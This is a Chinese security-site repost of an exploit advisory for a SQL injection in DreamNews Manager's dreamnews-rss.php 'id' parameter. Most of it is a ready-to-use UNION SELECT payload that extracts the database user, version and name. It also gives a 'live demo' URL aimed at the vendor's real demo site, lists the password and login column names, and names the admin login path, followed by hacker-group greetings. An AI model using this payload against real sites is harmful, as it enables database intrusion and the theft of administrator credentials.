DreamNews Manager (id) Remote SQL Injection Vulnerability

页面导航:首页 > 网络安全 > Exploit > DreamNews Manager (id) Remote SQL Injection Vulnerability

DreamNews Manager (id) Remote SQL Injection Vulnerability

来源:互联网 作者:脚本宝典 时间:2015-07-19 15:55 【

# dreamnews ( rss) Remote SQL Injection Vulnerability #======================================================== # Author: Hussin X = # = # Home : www.tryag.cc/cc = # = # email: darkangel_g85[at]Yahoo[DoT]com = # = #=========================

# dreamnews ( rss) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#========================================================= 
#
# script : http://dreamlevels.com/dreamnews.php
#
# DorK : N/A

##########################################################

Exploit: 

www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--


L!VE DEMO:

http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--


column_name :

user_password
user_login



Admin Login :

/admin/

########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# # 
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################

Im IRAQi 

Tags:

文章评论

最 近 更 新
热 点 排 行
Js与CSS工具
代码转换工具

<